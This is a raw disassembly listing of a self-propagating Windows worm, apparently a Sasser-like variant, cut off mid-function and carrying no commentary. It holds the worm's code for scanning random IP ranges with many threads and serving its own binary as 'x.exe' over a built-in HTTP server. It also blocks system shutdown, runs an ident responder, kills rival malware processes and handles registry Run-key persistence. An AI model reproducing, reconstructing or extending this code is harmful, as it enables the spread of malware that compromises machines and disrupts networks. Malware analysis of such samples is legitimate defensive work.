mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3150117C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_31501A14
call dword_31501180 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31501A14: ; CODE XREF: sub_315019F3+15�j
lea eax, [ebp+var_34]
push eax
call dword_31501188 ; gethostbyname
test eax, eax
jnz short loc_31501A29
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31501A29: ; CODE XREF: sub_315019F3+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_315019F3 endp
; =============== S U B R O U T I N E =======================================
sub_31501A32 proc near ; CODE XREF: sub_315020C4+22�p
; sub_31502128+27�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_3150115C ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31501A32 endp
; =============== S U B R O U T I N E =======================================
sub_31501A48 proc near ; CODE XREF: sub_31501D96+40�p
; sub_31501D96+4C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_315010DC ; OpenEventA
test eax, eax
jz short locret_31501A61
push eax
call dword_315010D8 ; SetEvent
locret_31501A61: ; CODE XREF: sub_31501A48+10�j
retn
sub_31501A48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501A62 proc near ; DATA XREF: sub_31501BA8+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_31501A93
push 1
jmp loc_31501B4E
; ---------------------------------------------------------------------------
loc_31501A93: ; CODE XREF: sub_31501A62+28�j
mov esi, dword_31501120
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31501B5E
lea eax, [ebp+var_100]
push offset a_exe ; ".exe"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31501B5E
mov esi, dword_3150119C
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push ds:dword_31506160
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31503A3E ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_31501B10: ; CODE XREF: sub_31501A62+E8�j
mov eax, ds:dword_31506160
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_31501B22
mov eax, ecx
loc_31501B22: ; CODE XREF: sub_31501A62+BC�j
test eax, eax
jz short loc_31501B51
push 0
push eax
mov eax, ds:dword_31506158
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_31501B4C
cmp eax, 1000h
jb short loc_31501B51
push 64h
add edi, eax
call dword_315010A4 ; Sleep
jmp short loc_31501B10
; ---------------------------------------------------------------------------
loc_31501B4C: ; CODE XREF: sub_31501A62+D5�j
push 2
loc_31501B4E: ; CODE XREF: sub_31501A62+2C�j
pop eax
jmp short loc_31501BA1
; ---------------------------------------------------------------------------
loc_31501B51: ; CODE XREF: sub_31501A62+C2�j
; sub_31501A62+DC�j
push offset dword_3150615C
call dword_315010E4 ; InterlockedIncrement
jmp short loc_31501B7C
; ---------------------------------------------------------------------------
loc_31501B5E: ; CODE XREF: sub_31501A62+49�j
; sub_31501A62+61�j
mov esi, dword_3150119C
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_31505A84
push ebx
call esi ; send
loc_31501B7C: ; CODE XREF: sub_31501A62+FA�j
push 7D0h
call dword_315010A4 ; Sleep
push 2
push ebx
call dword_315011A4 ; shutdown
push ebx
call dword_315011A8 ; closesocket
push 0
call dword_315010E0 ; ExitThread
xor eax, eax
loc_31501BA1: ; CODE XREF: sub_31501A62+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31501A62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501BA8 proc near ; DATA XREF: sub_31501D96+14B�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_315018BA
lea eax, [ebp+var_130]
push 104h
push eax
push offset aSystemUpdate ; "System Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov ds:dword_3150615C, ebx
call sub_315023E4
add esp, 14h
test eax, eax
jnz loc_31501CDD
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_315010F0 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31501C14
push 1
call dword_315010E0 ; ExitThread
loc_31501C14: ; CODE XREF: sub_31501BA8+62�j
push ebx
push esi
call dword_315010EC ; GetFileSize
push eax
mov ds:dword_31506160, eax
call sub_31502800
pop ecx
mov ds:dword_31506158, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push ds:dword_31506160
push eax
push esi
call dword_315010E8 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov ds:dword_31506160, eax
call dword_315010BC ; CloseHandle
push ebx
push 1
push 2
call dword_3150118C ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31503A38 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31501C76: ; CODE XREF: sub_31501BA8+E5�j
; sub_31501BA8+ED�j ...
call dword_31501124 ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov ds:dword_3150618C, eax
jz short loc_31501C76
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31501C76
push eax
call dword_31501194 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31501170 ; bind
test eax, eax
jnz short loc_31501C76
push 64h
push edi
call dword_31501174 ; listen
mov [ebp+var_8], esi
pop esi
loc_31501CBF: ; CODE XREF: sub_31501BA8+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31501178 ; accept
push eax
push offset sub_31501A62
call sub_31501911
pop ecx
pop ecx
jmp short loc_31501CBF
; ---------------------------------------------------------------------------
loc_31501CDD: ; CODE XREF: sub_31501BA8+3D�j
push ebx
call dword_315010E0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_31501BA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501CEC proc near ; CODE XREF: sub_31501D96:loc_31501EB6�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3150116C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_31501CEC endp
; ---------------------------------------------------------------------------
loc_31501D18: ; CODE XREF: UPX1:31508558�j
push 0
call dword_315010C4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov ds:dword_31506190, eax
call dword_31501094 ; DeleteFileA
call sub_315018BA
push offset aUterm13_2i ; "uterm13.2i"
call sub_315018E8
pop ecx
mov ds:dword_31506164, eax
call dword_31501098 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31501D5A
push 1
call dword_3150109C ; ExitProcess
loc_31501D5A: ; CODE XREF: UPX0:31501D50�j
call sub_31501727
call sub_31502548
call sub_315026C2
push offset sub_31501D96
call sub_315017AF
test eax, eax
pop ecx
jz short loc_31501D7F
push 0
call sub_31501D96
loc_31501D7F: ; CODE XREF: UPX0:31501D76�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31501D82 proc near ; CODE XREF: sub_31501D96:loc_31501F04�p
; sub_315020C4:loc_315020DD�p ...
push 0
push ds:dword_31506168
call dword_31501090 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31501D82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501D96 proc near ; CODE XREF: UPX0:31501D7A�p
; DATA XREF: UPX0:31501D69�o
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_315011B0
push offset loc_31503A80
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU13_2ix ; "u13.2ix"
xor edi, edi
push edi
push 1
push edi
call dword_3150108C ; CreateEventA
mov ds:dword_31506168, eax
mov [ebp+var_4], edi
push offset aU10x ; "u10x"
call sub_31501A48
mov [esp+8+var_8], offset aU11x ; "u11x"
call sub_31501A48
mov [esp+8+var_8], offset aU12x ; "u12x"
call sub_31501A48
mov [esp+8+var_8], offset aU13x ; "u13x"
call sub_31501A48
mov [esp+8+var_8], offset aU13ix ; "u13ix"
call sub_31501A48
mov [esp+8+var_8], offset aU8 ; "u8"
call sub_315018E8
mov [esp+8+var_8], offset aU9 ; "u9"
call sub_315018E8
mov [esp+8+var_8], offset aU10 ; "u10"
call sub_315018E8
mov [esp+8+var_8], offset aU11 ; "u11"
call sub_315018E8
mov [esp+8+var_8], offset aU12 ; "u12"
call sub_315018E8
mov [esp+8+var_8], offset aU13 ; "u13"
call sub_315018E8
mov [esp+8+var_8], offset aU13i ; "u13i"
call sub_315018E8
mov [esp+8+var_8], offset aU13_2i ; "u13.2i"
call sub_315018E8
mov [esp+8+var_8], offset aU14 ; "u14"
call sub_315018E8
pop ecx
cmp [ebp+arg_0], edi
jz short loc_31501EB6
push offset aWs2_32 ; "ws2_32"
mov esi, dword_315010B4
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm13_2i ; "uterm13.2i"
call sub_315018E8
pop ecx
mov ds:dword_31506164, eax
loc_31501EB6: ; CODE XREF: sub_31501D96+E5�j
call sub_31501CEC
push edi
push offset sub_31501F6B
call sub_31501911
pop ecx
pop ecx
push 1F4h
mov esi, dword_315010A4
call esi ; Sleep
push edi
push offset loc_31503408
call sub_315018F7
push edi
push offset sub_31501BA8
call sub_315018F7
push edi
push offset sub_31502BE8
call sub_315018F7
push edi
push offset loc_315022D3
call sub_315018F7
add esp, 20h
loc_31501F04: ; CODE XREF: sub_31501D96+185�j
call sub_31501D82
test eax, eax
jnz short loc_31501F1D
push edi
call dword_31501038 ; AbortSystemShutdownA
push 1388h
call esi ; Sleep
jmp short loc_31501F04
; ---------------------------------------------------------------------------
loc_31501F1D: ; CODE XREF: sub_31501D96+175�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_31501D96 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_31501F3A proc near ; CODE XREF: sub_31501F6B+F9�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_31503A3E ; strlen
test eax, eax
pop ecx
jbe short loc_31501F68
loc_31501F4D: ; CODE XREF: sub_31501F3A+2C�j
mov al, [esi+edi]
cmp al, 0Ah
jz short loc_31501F58
cmp al, 0Dh
jnz short loc_31501F5C
loc_31501F58: ; CODE XREF: sub_31501F3A+18�j
and byte ptr [esi+edi], 0
loc_31501F5C: ; CODE XREF: sub_31501F3A+1C�j
push edi
inc esi
call sub_31503A3E ; strlen
cmp esi, eax
pop ecx
jb short loc_31501F4D
loc_31501F68: ; CODE XREF: sub_31501F3A+11�j
pop edi
pop esi
retn
sub_31501F3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501F6B proc near ; DATA XREF: sub_31501D96+126�o
var_154 = dword ptr -154h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 148h
push ebx
mov [ebp+var_8], esp
call sub_315018BA
call dword_31501124 ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_48]
add edx, 3
push edx
push eax
call sub_31501932
lea eax, [ebp+var_48]
mov ebx, offset dword_3150616C
push eax
push ebx
call sub_31503A8C ; strcpy
add esp, 10h
mov [ebp+var_4], 10h
push 0
push 1
push 2
call dword_3150118C ; socket
push 0
mov [ebp+var_8], eax
mov [ebp+var_18], 2
call dword_31501168 ; ntohl
push 71h
mov [ebp+var_14], eax
call dword_31501194 ; ntohs
push [ebp+var_4]
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call dword_31501170 ; bind
test eax, eax
jz short loc_31501FF7
push 1
pop eax
loc_31501FF2: ; CODE XREF: sub_31501F6B+A2�j
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31501FF7: ; CODE XREF: sub_31501F6B+82�j
push esi
push edi
push 5
push [ebp+var_8]
call dword_31501174 ; listen
test eax, eax
jz short loc_3150200F
push 1
pop eax
pop edi
pop esi
jmp short loc_31501FF2
; ---------------------------------------------------------------------------
loc_3150200F: ; CODE XREF: sub_31501F6B+9B�j
mov edi, dword_315010A4
loc_31502015: ; CODE XREF: sub_31501F6B+C6�j
; sub_31501F6B+E8�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+var_8]
call dword_31501178 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31502033
push 64h
call edi ; Sleep
jmp short loc_31502015
; ---------------------------------------------------------------------------
loc_31502033: ; CODE XREF: sub_31501F6B+C0�j
push 0
lea eax, [ebp+var_148]
push 100h
push eax
push esi
call dword_315011A0 ; recv
test eax, eax
jnz short loc_31502055
loc_3150204C: ; CODE XREF: sub_31501F6B+157�j
push esi
call dword_315011A8 ; closesocket
jmp short loc_31502015
; ---------------------------------------------------------------------------
loc_31502055: ; CODE XREF: sub_31501F6B+DF�j
and [ebp+eax+var_148], 0
lea eax, [ebp+var_148]
push eax
call sub_31501F3A
lea eax, [ebp+var_148]
mov [esp+154h+var_154], offset aUseridUnix ; " : USERID : UNIX : "
push eax
call sub_31503A86 ; strcat
lea eax, [ebp+var_148]
push ebx
push eax
call sub_31503A86 ; strcat
lea eax, [ebp+var_148]
push offset asc_31505B8C ; "\r\n"
push eax
call sub_31503A86 ; strcat
add esp, 18h
lea eax, [ebp+var_148]
push 0
push eax
call sub_31503A3E ; strlen
pop ecx
push eax
lea eax, [ebp+var_148]
push eax
push esi
call dword_3150119C ; send
push 1388h
call edi ; Sleep
jmp short loc_3150204C
sub_31501F6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315020C4 proc near ; DATA XREF: sub_31502128+55�o
; sub_315021B0+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_315020D3
push 1
pop eax
jmp short locret_31502124
; ---------------------------------------------------------------------------
loc_315020D3: ; CODE XREF: sub_315020C4+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_315020DD: ; CODE XREF: sub_315020C4+5A�j
call sub_31501D82
test eax, eax
jnz short loc_31502120
call sub_31501A32
test eax, eax
jz short loc_31502120
cmp [ebp+var_1], bl
jz short loc_31502119
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_315011C0
movzx esi, ds:word_3150619C
pop ecx
call dword_31501124 ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_315010A4 ; Sleep
loc_31502119: ; CODE XREF: sub_315020C4+2E�j
inc bl
cmp bl, 0FFh
jb short loc_315020DD
loc_31502120: ; CODE XREF: sub_315020C4+20�j
; sub_315020C4+29�j
pop esi
xor eax, eax
pop ebx
locret_31502124: ; CODE XREF: sub_315020C4+D�j
leave
retn 4
sub_315020C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502128 proc near ; DATA XREF: sub_315021B0+7E�o
; UPX0:31502365�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31502136
push 1
pop eax
jmp short loc_315021AC
; ---------------------------------------------------------------------------
loc_31502136: ; CODE XREF: sub_31502128+7�j
push ebx
push esi
push edi
call sub_315018BA
mov esi, dword_31501124
xor ebx, ebx
loc_31502146: ; CODE XREF: sub_31502128+7D�j
call sub_31501D82
test eax, eax
jnz short loc_315021A7
call sub_31501A32
test eax, eax
jz short loc_315021A7
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31506194
mov byte ptr [ebp+arg_0+3], al
call dword_315010E4 ; InterlockedIncrement
push [ebp+arg_0]
call sub_315011C0
test eax, eax
pop ecx
jnz short loc_31502189
push [ebp+arg_0]
push offset sub_315020C4
call sub_31501911
pop ecx
pop ecx
loc_31502189: ; CODE XREF: sub_31502128+50�j
movzx edi, ds:word_3150619C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_315010A4 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_31502146
loc_315021A7: ; CODE XREF: sub_31502128+25�j
; sub_31502128+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_315021AC: ; CODE XREF: sub_31502128+C�j
pop ebp
retn 4
sub_31502128 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315021B0 proc near ; DATA XREF: UPX0:3150237D�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_315018BA
call sub_31501D82
test eax, eax
jnz loc_31502269
push ebx
mov ebx, dword_315010A4
push esi
mov esi, dword_31501124
push edi
loc_315021D6: ; CODE XREF: sub_315021B0+48�j
; sub_315021B0+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_315021E5: ; CODE XREF: sub_315021B0+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_315021E5
call sub_315019F3
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_315021D6
call sub_31501A32
test eax, eax
jz short loc_31502241
push offset dword_31506194
call dword_315010E4 ; InterlockedIncrement
push edi
call sub_315011C0
test eax, eax
pop ecx
jnz short loc_31502248
push edi
push offset sub_315020C4
call sub_31501911
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_3150222D: ; CODE XREF: sub_315021B0+8D�j
push edi
push offset sub_31502128
call sub_31501911
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_3150222D
jmp short loc_31502248
; ---------------------------------------------------------------------------
loc_31502241: ; CODE XREF: sub_315021B0+51�j
push 2710h
call ebx ; Sleep
loc_31502248: ; CODE XREF: sub_315021B0+67�j
; sub_315021B0+8F�j
movzx edi, ds:word_3150619C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_31501D82
test eax, eax
jz loc_315021D6
pop edi
pop esi
pop ebx
loc_31502269: ; CODE XREF: sub_315021B0+11�j
push 0
call dword_315010E0 ; ExitThread
xor eax, eax
leave
retn 4
sub_315021B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502277 proc near ; CODE XREF: UPX0:loc_3150233E�p
; UPX0:loc_315023A8�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_315019F3
push eax
call dword_31501190 ; inet_ntoa
mov esi, dword_31501088
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpyA
push ds:dword_3150618C
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3150113C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_31505002
call esi ; lstrcpyA
push offset byte_31505000
call dword_315010A0 ; lstrlenA
mov byte_31505000[eax], 0DFh
pop esi
leave
retn
sub_31502277 endp
; ---------------------------------------------------------------------------
loc_315022D3: ; DATA XREF: sub_31501D96+161�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebp, ebp
push edi
mov ds:dword_31506194, ebp
call sub_31501A32
mov esi, dword_315010A4
mov edi, 1388h
test eax, eax
jnz short loc_31502301
loc_315022F5: ; CODE XREF: UPX0:315022FF�j
push edi
call esi ; Sleep
call sub_31501A32
test eax, eax
jz short loc_315022F5
loc_31502301: ; CODE XREF: UPX0:315022F3�j
lea eax, [esp+14h]
push ebp
push eax
call dword_3150115C ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov ds:dword_31506198, ebp
pop ebx
mov ds:word_3150619C, 96h
jz short loc_3150233E
mov ds:dword_31506198, 1
mov ebx, 15Eh
mov ds:word_3150619C, 14h
loc_3150233E: ; CODE XREF: UPX0:31502324�j
call sub_31502277
mov ebp, [esp+14h]
cmp ebp, 100007Fh
jz short loc_3150235C
push ebp
push offset sub_315020C4
call sub_31501911
pop ecx
pop ecx
loc_3150235C: ; CODE XREF: UPX0:3150234D�j
mov dword ptr [esp+10h], 4
loc_31502364: ; CODE XREF: UPX0:31502375�j
push ebp
push offset sub_31502128
call sub_31501911
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_31502364
test ebx, ebx
jle short loc_3150238C
loc_3150237B: ; CODE XREF: UPX0:3150238A�j
push 0
push offset sub_315021B0
call sub_31501911
pop ecx
dec ebx
pop ecx
jnz short loc_3150237B
loc_3150238C: ; CODE XREF: UPX0:31502379�j
; UPX0:31502398�j ...
call sub_31501A32
test eax, eax
jz short loc_3150239A
push edi
call esi ; Sleep
jmp short loc_3150238C
; ---------------------------------------------------------------------------
loc_3150239A: ; CODE XREF: UPX0:31502393�j
; UPX0:315023A6�j
call sub_31501A32
test eax, eax
jnz short loc_315023A8
push edi
call esi ; Sleep
jmp short loc_3150239A
; ---------------------------------------------------------------------------
loc_315023A8: ; CODE XREF: UPX0:315023A1�j
call sub_31502277
jmp short loc_3150238C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315023AF proc near ; CODE XREF: sub_31502548+8C�p
; sub_315026C2+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3150102C ; RegOpenKeyExA
test eax, eax
jnz short loc_315023E2
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31501030 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31501034 ; RegCloseKey
loc_315023E2: ; CODE XREF: sub_315023AF+1C�j
pop ebp
retn
sub_315023AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315023E4 proc near ; CODE XREF: sub_31501BA8+33�p
; sub_31502548+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3150102C ; RegOpenKeyExA
test eax, eax
jz short loc_31502410
push 1
pop eax
jmp short loc_3150243A
; ---------------------------------------------------------------------------
loc_31502410: ; CODE XREF: sub_315023E4+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31501028 ; RegQueryValueExA
test eax, eax
jz short loc_3150242F
push 2
pop esi
loc_3150242F: ; CODE XREF: sub_315023E4+46�j
push [ebp+arg_10]
call dword_31501034 ; RegCloseKey
mov eax, esi
loc_3150243A: ; CODE XREF: sub_315023E4+2A�j
pop esi
leave
retn
sub_315023E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150243D proc near ; CODE XREF: sub_315025F6+96�p
; sub_315026C2+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31501020 ; RegCreateKeyExA
test eax, eax
jz short loc_31502466
push 1
pop eax
jmp short loc_3150248D
; ---------------------------------------------------------------------------
loc_31502466: ; CODE XREF: sub_3150243D+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31501024 ; RegSetValueExA
test eax, eax
jz short loc_31502482
push 2
pop esi
loc_31502482: ; CODE XREF: sub_3150243D+40�j
push [ebp+arg_4]
call dword_31501034 ; RegCloseKey
mov eax, esi
loc_3150248D: ; CODE XREF: sub_3150243D+27�j
pop esi
pop ebp
retn
sub_3150243D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502490 proc near ; CODE XREF: sub_31502548+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_315010A0 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_31502544
loc_315024B0: ; CODE XREF: sub_31502490+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_315024B9
dec esi
jns short loc_315024B0
loc_315024B9: ; CODE XREF: sub_31502490+24�j
push 0
push 2
call sub_31503ABC ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_31502544
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31503A38 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31503AB6 ; Process32First
test eax, eax
jz short loc_31502544
lea esi, [esi+ebx+1]
loc_31502501: ; CODE XREF: sub_31502490+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31502531
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_315010C0 ; OpenProcess
push 0
push eax
call dword_31501080 ; TerminateProcess
loc_31502531: ; CODE XREF: sub_31502490+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31503AB0 ; Process32Next
test eax, eax
jnz short loc_31502501
loc_31502544: ; CODE XREF: sub_31502490+1A�j
; sub_31502490+38�j ...
pop esi
pop ebx
leave
retn
sub_31502490 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502548 proc near ; CODE XREF: UPX0:31501D5F�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_315025B1: ; CODE XREF: sub_31502548+A7�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
